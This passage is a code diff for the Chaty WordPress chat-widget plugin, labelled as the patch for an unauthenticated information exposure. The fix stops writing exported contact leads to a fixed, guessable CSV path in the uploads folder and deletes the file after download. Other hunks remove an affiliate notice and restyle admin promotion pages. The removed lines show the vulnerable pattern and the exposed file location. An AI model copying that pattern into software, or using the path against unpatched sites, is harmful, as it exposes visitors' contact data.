CVE-2026-27370: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button – Chaty <= 3.5.1 – Unauthenticated Information Exposure (chaty)

--- a/chaty/admin/class-admin-base.php
+++ b/chaty/admin/class-admin-base.php
@@ -737,7 +737,9 @@
                 'has_js_access' => current_user_can("unfiltered_html")?true:false,
                 'js_message' => esc_html__("Please remove the JavaScript from the channels or ask the website's administrator to give you access to add JavaScript.", "chaty"),
                 'remove' => esc_html__("Remove", "chaty"),
-                'icon_img' => esc_url(CHT_PLUGIN_URL."admin/assets/images/icon-picker.png")
+                'icon_img' => esc_url(CHT_PLUGIN_URL."admin/assets/images/icon-picker.png"),
+                'chatway_install_url' => self_admin_url("admin.php?page=chaty-live-chat"),
+                'chatway_url' => self_admin_url('admin.php?page=chatway')
             ]
         );
         $whatsapp_settings = [];
@@ -1276,8 +1278,9 @@
             $postData = filter_input_array(INPUT_GET);
             if (isset($postData['download_chaty_file']) && $postData['download_chaty_file'] == "chaty_contact_leads" && isset($postData['nonce'])) {
                 if (wp_verify_nonce($postData['nonce'], "download_chaty_contact_leads")) {
+                    $file_name = "chaty-contact-leads-".uniqid().".csv";
                     $uploadDir = wp_upload_dir();
-                    $file      = $uploadDir['basedir']."/chaty_contact_leads.csv";
+                    $file      = $uploadDir['basedir']."/".$file_name;
                     $fp        = fopen($file, "w") or die("Error Couldn't open for writing!");

                     global $wpdb;
@@ -1330,6 +1333,8 @@
                     header("Content-Length: ".filesize($file));
                     header("Content-Type: application/octet-stream;");
                     readfile($file);
+
+                    unlink($file);
                     exit;
                 }//end if
             }//end if
@@ -2525,7 +2530,6 @@
     public function chaty_text()
     {
         load_plugin_textdomain("chaty", false, dirname(plugin_basename(__FILE__)).'/languages/');
-
     }//end chaty_text()


--- a/chaty/cht-icons.php
+++ b/chaty/cht-icons.php
@@ -7,7 +7,7 @@
   Author URI: https://premio.io/downloads/chaty/
   Text Domain: chaty
   Domain Path: /languages
-  Version: 3.5.1
+  Version: 3.5.2
   License: GPLv3
 */

@@ -27,7 +27,7 @@
 define('CHT_PRO_URL', admin_url("admin.php?page=chaty-app-upgrade"));
 define('CHT_PLUGIN_URL', plugin_dir_url(__FILE__));
 define('CHT_PLUGIN_BASE', plugin_basename(CHT_FILE));
-define('CHT_VERSION', "3.5.1");
+define('CHT_VERSION', "3.5.2");
 if(!defined('CHT_DEV_MODE')) {
     define('CHT_DEV_MODE', false);
 }
@@ -141,7 +141,6 @@
         if(is_admin()) {
             require_once CHT_ADMIN_INC . '/chaty-timezone.php';
             require_once CHT_INC . '/class-review-box.php';
-            require_once CHT_INC . '/class-affiliate.php';
             require_once CHT_INC . '/class-upgrade-box.php';
             require_once CHT_INC . '/class-email-signup.php';
         }
--- a/chaty/includes/class-affiliate.php
+++ b/chaty/includes/class-affiliate.php
@@ -1,255 +0,0 @@
-<?php
-/**
- * Premio Affilate Class
- *
- * @author  : Premio <contact@premio.io>
- * @license : GPL2
- * */
-
-if (defined('ABSPATH') === false) {
-    exit;
-}
-
-class Chaty_Affiliate_Program
-{
-
-    /**
-     * The Name of this plugin.
-     *
-     * @var    string    $pluginName    The Name of this plugin.
-     * @since  1.0.0
-     * @access public
-     */
-    public $pluginName = "Chaty";
-
-    /**
-     * The Slug of this plugin.
-     *
-     * @var    string    $pluginSlug    The Slug of this plugin.
-     * @since  1.0.0
-     * @access public
-     */
-    public $pluginSlug = "chaty";
-
-    /**
-     * __construct method initializes the object and adds action hooks.
-     *
-     * @return void
-     */
-    public function __construct()
-    {
-        add_action("wp_ajax_".$this->pluginSlug."_affiliate_program", [$this, "affiliate_program"]);
-
-        add_action('admin_notices', [$this, 'admin_notices']);
-
-    }//end __construct()
-
-
-    /**
-     * affiliate_program method handles the affiliate program action.
-     *
-     * This method checks if the current user has the capability to manage options.
-     * If the user has the capability, it retrieves the nonce and days values from the POST data.
-     * Then, it verifies the nonce and performs the necessary actions based on the values.
-     * If the days value is -1, it adds an option to hide the affiliate box.
-     * Otherwise, it adds an option to set the date after which the affiliate box should be shown.
-     *
-     * @return void
-     */
-    public function affiliate_program()
-    {
-        if (current_user_can('manage_options')) {
-            $nonce = filter_input(INPUT_POST, 'nonce');
-            $days  = filter_input(INPUT_POST, 'days');
-            if (!empty($nonce) && wp_verify_nonce($nonce, $this->pluginSlug."_affiliate_program")) {
-                if ($days == -1) {
-                    add_option($this->pluginSlug."_hide_affiliate_box", "1");
-                } else {
-                    $date = gmdate("Y-m-d", strtotime("+".$days." days"));
-                    update_option($this->pluginSlug."_show_affiliate_box_after", $date);
-                }
-            }
-
-            die;
-        }
-
-    }//end affiliate_program()
-
-
-    /**
-     * admin_notices method displays notices in the admin area for users with the 'manage_options' capability.
-     *
-     * @return void
-     */
-    public function admin_notices()
-    {
-        if (current_user_can('manage_options')) {
-            $isHidden = get_option($this->pluginSlug."_hide_affiliate_box");
-            if ($isHidden !== false) {
-                return;
-            }
-
-            $dateToShow = get_option($this->pluginSlug."_show_affiliate_box_after");
-            if ($dateToShow === false || empty($dateToShow)) {
-                $date = gmdate("Y-m-d", strtotime("+5 days"));
-                update_option($this->pluginSlug."_show_affiliate_box_after", $date);
-                return;
-            }
-
-            $currentDate = gmdate("Y-m-d");
-            if ($currentDate < $dateToShow) {
-                return;
-            }
-            ?>
-            <style>
-                .<?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate p a {
-                    display: inline-block;
-                    float: right;
-                    text-decoration: none;
-                    color: #999999;
-                    position: absolute;
-                    right: 12px;
-                    top: 12px;
-                }
-
-                .notice.chaty-premio-affiliate {
-                    display: block !important;
-                }
-
-                .<?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate p a:hover, .<?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate p a:focus {
-                    color: #333333;
-                }
-
-                .<?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate .button span {
-                    display: inline-block;
-                    line-height: 27px;
-                    font-size: 16px;
-                }
-
-                .<?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate {
-                    padding: 1px 100px 12px 12px;
-                    margin: 15px 15px 2px;
-                    position: relative;
-                }
-
-                .<?php echo esc_attr($this->pluginSlug) ?>-affiliate-popup {
-                    position: fixed;
-                    width: 100%;
-                    height: 100%;
-                    z-index: 10001;
-                    background: rgba(0, 0, 0, 0.65);
-                    top: 0;
-                    left: 0;
-                    display: none;
-                }
-
-                .<?php echo esc_attr($this->pluginSlug) ?>-affiliate-popup-content {
-                    background: #ffffff;
-                    padding: 20px;
-                    position: absolute;
-                    max-width: 450px;
-                    width: 100%;
-                    margin: 0 auto;
-                    top: 45%;
-                    left: 0;
-                    right: 0;
-                    -webkit-border-radius: 5px;
-                    -moz-border-radius: 5px;
-                    border-radius: 5px;
-                :;
-                }
-
-                .<?php echo esc_attr($this->pluginSlug) ?>-affiliate-title {
-                    padding: 0 0 10px 0;
-                    font-weight: bold;
-                }
-
-                .<?php echo esc_attr($this->pluginSlug) ?>-affiliate-options a {
-                    display: block;
-                    margin: 5px 0 5px 0;
-                    color: #333;
-                    text-decoration: none;
-                }
-
-                .<?php echo esc_attr($this->pluginSlug) ?>-affiliate-options a.dismiss {
-                    color: #999;
-                }
-
-                .<?php echo esc_attr($this->pluginSlug) ?>-affiliate-options a:hover, .affiliate-options a:focus {
-                    color: #0073aa;
-                }
-
-                button.<?php echo esc_attr($this->pluginSlug) ?>-close-affiliate-popup {
-                    position: absolute;
-                    top: 5px;
-                    right: 0;
-                    border: none;
-                    background: transparent;
-                    cursor: pointer;
-                }
-
-                a.button.button-primary.<?php echo esc_attr($this->pluginSlug) ?>-affiliate-btn {
-                    font-size: 14px;
-                    background: #F51366;
-                    color: #fff;
-                    border: solid 1px #F51366;
-                    border-radius: 3px;
-                    line-height: 24px;
-                    -webkit-box-shadow: 0 3px 5px -3px #333333;
-                    -moz-box-shadow: 0 3px 5px -3px #333333;
-                    box-shadow: 0 3px 5px -3px #333333;
-                    text-shadow: none;
-                }
-            </style>
-            <div class="notice notice-info <?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate <?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate">
-                <p>
-                    <?php printf(esc_html__("Hi there, you've been using %1$s for a while now. Do you know that %2$s has an affiliate program? Join now and get %3$s", 'chaty'), "<b>".esc_attr($this->pluginName)."</b>", "<b>".esc_attr($this->pluginName)."</b>", "<b>25% lifetime commission</b>") ?>
-                    <a href="#" class="dismiss-btn"><span class="dashicons dashicons-no-alt"></span><?php  esc_html_e("Dismiss", 'chaty')?></a>
-                </p>
-                <div class="clear clearfix"></div>
-                <a class="button button-primary <?php echo esc_attr($this->pluginSlug) ?>-affiliate-btn" target="_blank" href="https://premio.io/affiliates/?utm_source=inapp&plugin=stars-testimonials&domain=<?php echo esc_attr($_SERVER['HTTP_HOST']) ?>"><?php esc_html_e("Tell me more", 'chaty') ?>  <span class="dashicons dashicons-arrow-right-alt"></span></a>
-            </div>
-            <div class="<?php echo esc_attr($this->pluginSlug) ?>-affiliate-popup">
-                <div class="<?php echo esc_attr($this->pluginSlug) ?>-affiliate-popup-content">
-                    <button class="<?php echo esc_attr($this->pluginSlug) ?>-close-affiliate-popup"><span class="dashicons dashicons-no-alt"></span></button>
-                    <div class="<?php echo esc_attr($this->pluginSlug) ?>-affiliate-title"><?php esc_html_e("Would you like us to remind  you about this later?", 'chaty') ?></div>
-                    <div class="<?php echo esc_attr($this->pluginSlug) ?>-affiliate-options">
-                        <a href="#" data-days="3"><?php esc_html_e("Remind me in 3 days", 'chaty') ?></a>
-                        <a href="#" data-days="10"><?php esc_html_e("Remind me in 10 days", 'chaty') ?></a>
-                        <a href="#" data-days="-1" class="dismiss"><?php esc_html_e("Don't remind me about this", 'chaty') ?></a>
-                    </div>
-                </div>
-            </div>
-            <script>
-                jQuery(document).ready(function () {
-                    jQuery(document).on("click", ".<?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate p a.dismiss-btn", function () {
-                        jQuery(".<?php echo esc_attr($this->pluginSlug) ?>-affiliate-popup").show();
-                    });
-                    jQuery(document).on("click", ".<?php echo esc_attr($this->pluginSlug) ?>-close-affiliate-popup", function () {
-                        jQuery(".<?php echo esc_attr($this->pluginSlug) ?>-affiliate-popup").hide();
-                    });
-                    jQuery(document).on("click", ".<?php echo esc_attr($this->pluginSlug) ?>-affiliate-options a", function () {
-                        var dataDays = jQuery(this).attr("data-days");
-                        jQuery(".<?php echo esc_attr($this->pluginSlug) ?>-affiliate-popup").hide();
-                        jQuery(".<?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate").hide();
-                        jQuery.ajax({
-                            url: "<?php echo esc_url(admin_url("admin-ajax.php")) ?>",
-                            data: "action=<?php echo esc_attr($this->pluginSlug) ?>_affiliate_program&days=" + dataDays + "&nonce=<?php echo esc_attr(wp_create_nonce($this->pluginSlug."_affiliate_program")) ?>",
-                            type: "post",
-                            success: function () {
-                                jQuery(".<?php echo esc_attr($this->pluginSlug) ?>-affiliate-popup").remove();
-                                jQuery(".<?php echo esc_attr($this->pluginSlug) ?>-premio-affiliate").remove();
-                            }
-                        });
-                    });
-                });
-            </script>
-            <?php
-        }//end if
-
-    }//end admin_notices()
-
-
-}//end class
-
-$chatyAffiliateProgram = new Chaty_Affiliate_Program();
--- a/chaty/views/admin/admin.php
+++ b/chaty/views/admin/admin.php
@@ -181,9 +181,9 @@
                     <!--/* Chatway */-->
                     <div id="chaty-tab-chatway" class="social-channel-tabs <?php echo ($step == 3) ? "active" : "" ?>">
                         <h1 class="section-title font-primary text-cht-gray-150 text-2xl border-b border-gray-150/40 px-4 sm:px-8 py-5">
-                            <strong><?php esc_html_e("Step 4:", "chaty") ?></strong> <?php esc_html_e("Add live chat", "chaty") ?>
+                            <strong><?php esc_html_e("Step 4:", "chaty") ?></strong> <?php esc_html_e("Add live chat + AI support agent", "chaty") ?>
                         </h1>
-                        <div class="p-5 md:p-8 pl-0 md:pl-0">
+                        <div class="p-5 md:p-8">
                             <?php require_once 'chatway.php'; ?>
                         </div>
                     </div>
--- a/chaty/views/admin/channels-section.php
+++ b/chaty/views/admin/channels-section.php
@@ -93,7 +93,7 @@
             Add Live Chat
         </a>
         <div class="manage--chatway">
-            <a href="<?php echo admin_url("plugin-install.php?s=chatway&tab=search&type=author") ?>" target="_blank" class="plugin-add--chatyway inline-flex font-primary items-center gap-0.5 py-1 px-2.5 border border-solid text-center justify-center !border-[#0446de] rounded-lg !text-[#0446de] hover:text-[#0446de] hover:bg-[#edf3f6]">
+            <a href="<?php echo admin_url("admin.php?page=chaty-live-chat") ?>" target="_blank" class="add-live-chatway-button plugin-add--chatyway inline-flex font-primary items-center gap-0.5 py-1 px-2.5 border border-solid text-center justify-center !border-[#0446de] rounded-lg !text-[#0446de] hover:text-[#0446de] hover:bg-[#edf3f6]">
                 <svg class="h-5 w-auto" width="20" height="24" viewBox="0 0 20 24" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M7.367 22.703l1.638-2.863L10.19 21.7s-.754-.134-1.44.194c-.687.328-1.384.81-1.384.81z" fill="#0038A5"></path><path d="M6.193 21.342a.97.97 0 00-.712-.564l-3.894-.72A1.94 1.94 0 010 18.153V6.534c0-1.43.7-2.77 1.876-3.585L4.39 1.205A4.606 4.606 0 017.798.45l8.982 1.548A3.879 3.879 0 0120 5.821v8.8c0 1.043-.42 2.04-1.163 2.77l-3.199 3.138a5.091 5.091 0 01-4.603 1.349l-1.858-.387a.97.97 0 00-.906.286l-.782.836a.485.485 0 01-.798-.137l-.498-1.134z" fill="#0446DE"></path><path d="M4.264 4.353a3.152 3.152 0 00-3.78 3.089v9.924a1.94 1.94 0 001.587 1.907l3.858.714a.97.97 0 01.719.582l.346.832c.105.253.44.303.615.094l.668-.801a.97.97 0 01.818-.346l3.067.232a2.667 2.667 0 002.868-2.659V8.126a1.94 1.94 0 00-1.553-1.9L4.264 4.352z" fill="#0038A5"></path><path d="M4.055 4.34a1.94 1.94 0 00-2.309 1.905v10.204a1.94 1.94 0 001.662 1.92l2.646.383a.97.97 0 01.739.546l.371.789a.364.364 0 00.614.098l.56-.65a.97.97 0 01.874-.327l3.601.521a1.94 1.94 0 002.217-1.92V8.07a1.94 1.94 0 00-1.57-1.904L4.055 4.34z" fill="#fff"></path><path d="M10.91 14.59L5.31 13.61c-.407-.072-.738.254-.58.636.511 1.242 1.94 3.195 4.473 2.544.522-.134 1.701-.812 2.034-1.715.083-.226-.092-.442-.329-.484z" fill="#0446DE"></path><ellipse cx="5.503" cy="9.962" rx=".993" ry="1.702" transform="rotate(-4.903 5.503 9.962)" fill="#0446DE"></ellipse><ellipse cx="10.749" cy="10.931" rx=".993" ry="1.702" transform="rotate(-4.903 10.749 10.93)" fill="#0446DE"></ellipse></svg>
                 Add Live Chat
             </a>
--- a/chaty/views/admin/chatway-notice.php
+++ b/chaty/views/admin/chatway-notice.php
@@ -9,10 +9,10 @@
         <div class="chatway-notice-message">
             <div class="chatway--notice--info plugin-not-installed <?php echo esc_attr($chatwayStatus == 'not-installed'?'':'hidden') ?>">
                 <div class="text-sm pb-3">
-                    <strong>Please note</strong> that the Chatway plugin is not installed on your WordPress dashboard and Chatway widget will not be visible on your website. <a target="_blank" href="<?php echo admin_url("plugin-install.php?s=chatway&tab=search&type=author") ?>" class="text-cht-primary hover:text-cht-primary-100 underline">Go to plugins</a> and install the Chatway plugin.
+                    <strong>Please note</strong> that the Chatway plugin is not installed on your WordPress dashboard and Chatway widget will not be visible on your website. <a target="_blank" href="<?php echo admin_url("admin.php?page=chaty-live-chat") ?>" class="text-cht-primary hover:text-cht-primary-100 underline">Go to plugins</a> and install the Chatway plugin.
                 </div>
                 <div class="flex gap-2.5">
-                    <a target="_blank" href="<?php echo admin_url("plugin-install.php?s=chatway&tab=search&type=author") ?>" class="text-cht-primary text-sm hover:text-cht-primary hover:bg-[#f9f6fd] items-center gap-1 border border-solid border-cht-primary-100 rounded inline-flex py-1 px-3">
+                    <a target="_blank" href="<?php echo admin_url("admin.php?page=chaty-live-chat") ?>" class="text-cht-primary text-sm hover:text-cht-primary hover:bg-[#f9f6fd] items-center gap-1 border border-solid border-cht-primary-100 rounded inline-flex py-1 px-3">
                         Install Chatway plugin
                         <svg data-v-7dab8964="" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path data-v-7dab8964="" d="M12 8.66667V12.6667C12 13.0203 11.8595 13.3594 11.6095 13.6095C11.3594 13.8595 11.0203 14 10.6667 14H3.33333C2.97971 14 2.64057 13.8595 2.39052 13.6095C2.14048 13.3594 2 13.0203 2 12.6667V5.33333C2 4.97971 2.14048 4.64057 2.39052 4.39052C2.64057 4.14048 2.97971 4 3.33333 4H7.33333" stroke="#b78deb" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path><path data-v-7dab8964="" d="M10 2H14V6" stroke="#b78deb" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path><path data-v-7dab8964="" d="M6.66797 9.33333L14.0013 2" stroke="#b78deb" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                     </a>
@@ -23,10 +23,10 @@
             </div>
             <div class="chatway--notice--info plugin-not-activated <?php echo esc_attr($chatwayStatus == 'not-activated'?'':'hidden') ?>">
                 <div class="text-sm pb-3">
-                    <strong>Please note</strong> that the Chatway plugin has not been activated. To activate it, <a target="_blank" href="<?php echo admin_url("plugin-install.php?s=chatway&tab=search&type=author") ?>" class="text-cht-primary hover:text-cht-primary-100 underline">go to plugins</a> and activate the Chatway again.
+                    <strong>Please note</strong> that the Chatway plugin has not been activated. To activate it, <a target="_blank" href="<?php echo admin_url("admin.php?page=chaty-live-chat") ?>" class="text-cht-primary hover:text-cht-primary-100 underline">go to plugins</a> and activate the Chatway again.
                 </div>
                 <div class="flex gap-2.5">
-                    <a target="_blank" href="<?php echo admin_url("plugin-install.php?s=chatway&tab=search&type=author") ?>" class="text-cht-primary text-sm hover:text-cht-primary hover:bg-[#f9f6fd] items-center gap-1 border border-solid border-cht-primary-100 rounded inline-flex py-1 px-3">
+                    <a target="_blank" href="<?php echo admin_url("admin.php?page=chaty-live-chat") ?>" class="text-cht-primary text-sm hover:text-cht-primary hover:bg-[#f9f6fd] items-center gap-1 border border-solid border-cht-primary-100 rounded inline-flex py-1 px-3">
                         Activate Chatway plugin
                         <svg data-v-7dab8964="" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path data-v-7dab8964="" d="M12 8.66667V12.6667C12 13.0203 11.8595 13.3594 11.6095 13.6095C11.3594 13.8595 11.0203 14 10.6667 14H3.33333C2.97971 14 2.64057 13.8595 2.39052 13.6095C2.14048 13.3594 2 13.0203 2 12.6667V5.33333C2 4.97971 2.14048 4.64057 2.39052 4.39052C2.64057 4.14048 2.97971 4 3.33333 4H7.33333" stroke="#b78deb" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path><path data-v-7dab8964="" d="M10 2H14V6" stroke="#b78deb" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path><path data-v-7dab8964="" d="M6.66797 9.33333L14.0013 2" stroke="#b78deb" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                     </a>
--- a/chaty/views/admin/chatway-setting.php
+++ b/chaty/views/admin/chatway-setting.php
@@ -203,7 +203,7 @@
                             <?php esc_attr_e("Change View Method", "chaty"); ?>
                             <svg data-v-7dab8964="" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path data-v-7dab8964="" d="M4 6L8 10L12 6" stroke="#83A1B7" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                         </button>
-                        <a target="_blank" href="<?php echo admin_url("plugin-install.php?s=chatway&tab=search&type=author") ?>" class="plugin-add--chatyway border font-primary text-sm text-[#3549fc] border-solid bg-white border-[#3549fc] hover:text-[#3549fc] focus:text-[#3549fc] rounded px-2.5 py-1 hover:bg-[#edf3f6]" type="button">
+                        <a target="_blank" href="<?php echo admin_url("admin.php?page=chaty-live-chat") ?>" class="plugin-add--chatyway border font-primary text-sm text-[#3549fc] border-solid bg-white border-[#3549fc] hover:text-[#3549fc] focus:text-[#3549fc] rounded px-2.5 py-1 hover:bg-[#edf3f6]" type="button">
                             <svg class="h-5 w-auto mr-1" width="20" height="24" viewBox="0 0 20 24" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1">
                                 <path d="M7.367 22.703l1.638-2.863L10.19 21.7s-.754-.134-1.44.194c-.687.328-1.384.81-1.384.81z" fill="#0038A5"></path><path d="M6.193 21.342a.97.97 0 00-.712-.564l-3.894-.72A1.94 1.94 0 010 18.153V6.534c0-1.43.7-2.77 1.876-3.585L4.39 1.205A4.606 4.606 0 017.798.45l8.982 1.548A3.879 3.879 0 0120 5.821v8.8c0 1.043-.42 2.04-1.163 2.77l-3.199 3.138a5.091 5.091 0 01-4.603 1.349l-1.858-.387a.97.97 0 00-.906.286l-.782.836a.485.485 0 01-.798-.137l-.498-1.134z" fill="#0446DE"></path><path d="M4.264 4.353a3.152 3.152 0 00-3.78 3.089v9.924a1.94 1.94 0 001.587 1.907l3.858.714a.97.97 0 01.719.582l.346.832c.105.253.44.303.615.094l.668-.801a.97.97 0 01.818-.346l3.067.232a2.667 2.667 0 002.868-2.659V8.126a1.94 1.94 0 00-1.553-1.9L4.264 4.352z" fill="#0038A5"></path><path d="M4.055 4.34a1.94 1.94 0 00-2.309 1.905v10.204a1.94 1.94 0 001.662 1.92l2.646.383a.97.97 0 01.739.546l.371.789a.364.364 0 00.614.098l.56-.65a.97.97 0 01.874-.327l3.601.521a1.94 1.94 0 002.217-1.92V8.07a1.94 1.94 0 00-1.57-1.904L4.055 4.34z" fill="#fff"></path><path d="M10.91 14.59L5.31 13.61c-.407-.072-.738.254-.58.636.511 1.242 1.94 3.195 4.473 2.544.522-.134 1.701-.812 2.034-1.715.083-.226-.092-.442-.329-.484z" fill="#0446DE"></path>
                                 <ellipse cx="5.503" cy="9.962" rx=".993" ry="1.702" transform="rotate(-4.903 5.503 9.962)" fill="#0446DE"></ellipse>
--- a/chaty/views/admin/chatway.php
+++ b/chaty/views/admin/chatway.php
@@ -1,82 +1,100 @@
 <?php
 $chatwayStatus = apply_filters('check_for_chatway_status', 'not-installed');
+
+$chatway_feature = [
+        esc_html__("24/7 AI support that handles repetitive questions", "chaty"),
+        esc_html__("All chats in one inbox (Website, Email, Messenger, Instagram)", "chaty"),
+        esc_html__("WooCommerce integration", "chaty"),
+        esc_html__("Custom automations & canned replies", "chaty"),
+        esc_html__("Multiple widgets & inboxes", "chaty"),
+        esc_html__("Live visitor insights and Multilingual support", "chaty"),
+];
+$chatwayURL = ($chatwayStatus == 'not-installed' || $chatwayStatus  == 'not-activated') ? self_admin_url("admin.php?page=chaty-live-chat") : self_admin_url('admin.php?page=chatway');
+
 ?>
 <div class="step-four chatway-content flex gap-4 items-center">
-    <div class="chatway-left flex-1 hidden sm:flex">
-        <img src="<?php echo esc_url(CHT_PLUGIN_URL) ?>admin/assets/images/chatway.png" alt="chatway" />
+    <div class="chatway-left flex-1 hidden sm:flex flex-col gap-3">
+        <img class="" src="<?php echo esc_url(CHT_PLUGIN_URL) ?>admin/assets/images/chatway.webp" alt="chatway" />
     </div>
     <div class="chatway-right flex-1 pl-4 sm:pl-0 ">
-        <div class="add-live-chat-info">
+        <div class="add-live-chat-info font-primary">

-            <div class="chatway-title text-xl font-semibold pb-4 font-primary text-cht-gray-150"><?php esc_html_e("Connect effortlessly with customers through Live Chat!", "chaty"); ?></div>
+            <div class="chatway-title text-[32px] font-bold pb-2 text-[#092030]"><?php esc_html_e("Install Chatway: Live Chat & AI", "chaty"); ?></div>

-            <p class="text-cht-gray-150 text-base"><?php esc_html_e("Add the Chatway Live Chat widget to your website and effectively communicate with visitors with features such as:", "chaty") ?></p>
-            <br>
-            <?php
-            $chatway_feature = [
-                esc_html__("Handle chats from your website, email, Facebook Messenger & Instagram in one place.", "chaty"),
-                esc_html__("Integrate with WooCommerce and create separate widgets and inboxes for multiple websites.", "chaty"),
-                esc_html__("Customize your widget, add FAQs, set up automated messages and canned responses to reply faster, and collaborate effortlessly with your team with notes and reminders.", "chaty"),
-                esc_html__("Access live visitor details, multilingual support, and unlimited conversations.", "chaty"),
-                esc_html__("Stay connected anywhere with Chatway’s iOS and Android apps.", "chaty"),
-             ]
-             ?>
-            <ul>
-                <?php foreach ($chatway_feature as $feature) { ?>
-                    <li class="text-cht-gray-150 text-base flex">
-                        <span class="flex-none inline-flex items-center w-6 h-6 bg-[rgba(39,184,54,0.16)] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#68CB9B" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
-                        <?php echo esc_html($feature); ?>
-                    </li>
-                <?php } ?>
-            </ul>
-            <div class="chatway-footer mt-5 add-live-chat-link">
-                <a id="add-live-chat-btn" target="_blank" href="<?php echo self_admin_url("admin.php?page=chaty-live-chat") ?>" class="inline-flex font-primary items-center w-64 gap-2.5 py-1 border border-solid text-center justify-center border-[#0446de] rounded-lg text-[#0446de] hover:text-[#0446de] hover:bg-[#edf3f6]">
+            <p class="text-[#092030] text-base"><?php esc_html_e("Talk to visitors instantly. Automate support with AI. Turn chats into customers.", "chaty") ?></p>
+            <div class="chatway-footer mt-4 add-live-chat-link">
+                <a id="add-live-chat-btn" target="_blank" href="<?php echo esc_url($chatwayURL) ?>" class="inline-flex font-primary items-center w-[228px] h-11 gap-2.5 py-1 border border-solid text-center text-base justify-center border-[#0446de] rounded-lg text-[#0446de] hover:text-[#0446de] hover:bg-[#edf3f6]">
                     <svg width="20" height="24" viewBox="0 0 20 24" fill="none" xmlns="http://www.w3.org/2000/svg" role="presentation" focusable="false" tabindex="-1"><path d="M7.367 22.703l1.638-2.863L10.19 21.7s-.754-.134-1.44.194c-.687.328-1.384.81-1.384.81z" fill="#0038A5"></path><path d="M6.193 21.342a.97.97 0 00-.712-.564l-3.894-.72A1.94 1.94 0 010 18.153V6.534c0-1.43.7-2.77 1.876-3.585L4.39 1.205A4.606 4.606 0 017.798.45l8.982 1.548A3.879 3.879 0 0120 5.821v8.8c0 1.043-.42 2.04-1.163 2.77l-3.199 3.138a5.091 5.091 0 01-4.603 1.349l-1.858-.387a.97.97 0 00-.906.286l-.782.836a.485.485 0 01-.798-.137l-.498-1.134z" fill="#0446DE"></path><path d="M4.264 4.353a3.152 3.152 0 00-3.78 3.089v9.924a1.94 1.94 0 001.587 1.907l3.858.714a.97.97 0 01.719.582l.346.832c.105.253.44.303.615.094l.668-.801a.97.97 0 01.818-.346l3.067.232a2.667 2.667 0 002.868-2.659V8.126a1.94 1.94 0 00-1.553-1.9L4.264 4.352z" fill="#0038A5"></path><path d="M4.055 4.34a1.94 1.94 0 00-2.309 1.905v10.204a1.94 1.94 0 001.662 1.92l2.646.383a.97.97 0 01.739.546l.371.789a.364.364 0 00.614.098l.56-.65a.97.97 0 01.874-.327l3.601.521a1.94 1.94 0 002.217-1.92V8.07a1.94 1.94 0 00-1.57-1.904L4.055 4.34z" fill="#fff"></path><path d="M10.91 14.59L5.31 13.61c-.407-.072-.738.254-.58.636.511 1.242 1.94 3.195 4.473 2.544.522-.134 1.701-.812 2.034-1.715.083-.226-.092-.442-.329-.484z" fill="#0446DE"></path><ellipse cx="5.503" cy="9.962" rx=".993" ry="1.702" transform="rotate(-4.903 5.503 9.962)" fill="#0446DE"></ellipse><ellipse cx="10.749" cy="10.931" rx=".993" ry="1.702" transform="rotate(-4.903 10.749 10.93)" fill="#0446DE"></ellipse></svg>
                     <?php esc_html_e("Add Live Chat", "chaty") ?>
                 </a>
+                <div class="font-primary mt-2 text-[#49687E] text-sm manage-live-chat-skip-text"><?php esc_html_e("Skip this step by saving the widget", "chaty") ?></div>
+            </div>
+            <div class="mt-5">
+                <div class="text-[#49687E] text-base pb-3 font-medium"><?php esc_html_e('Why Chatway?', 'chaty'); ?></div>
+                <ul>
+                    <?php foreach ($chatway_feature as $feature) { ?>
+                        <li class="text-[#092030] text-sm flex pb-2.5 mb-0 items-center">
+                            <span class="flex-none inline-flex items-center w-6 h-6 bg-[#27B8361F] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#0C7C17" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
+                            <?php echo esc_html($feature); ?>
+                        </li>
+                    <?php } ?>
+                </ul>
             </div>
         </div>
         <div class="manage-live-chat-info">
-            <div class="chatway-title text-xl font-semibold pb-3 font-primary text-cht-gray-150"><?php esc_html_e("You’re all set, enjoy Chatway :)", "chaty"); ?></div>
-            <div class="pb-3 text-base"><?php esc_html_e('Chatway has been added as your live chat channel. You can access and manage all conversations via the Chatway dashboard', 'chaty'); ?></div>
+            <div class="chatway-title text-3xl font-bold pb-2 text-[#092030]"><?php esc_html_e("Chatway installed successfully! 🚀", "chaty"); ?></div>
+            <p class="text-[#092030] text-base"><?php esc_html_e("Talk to your visitors instantly and turn conversations into customers.", "chaty") ?></p>
             <div class="manage-live-chat-wrap mt-5">
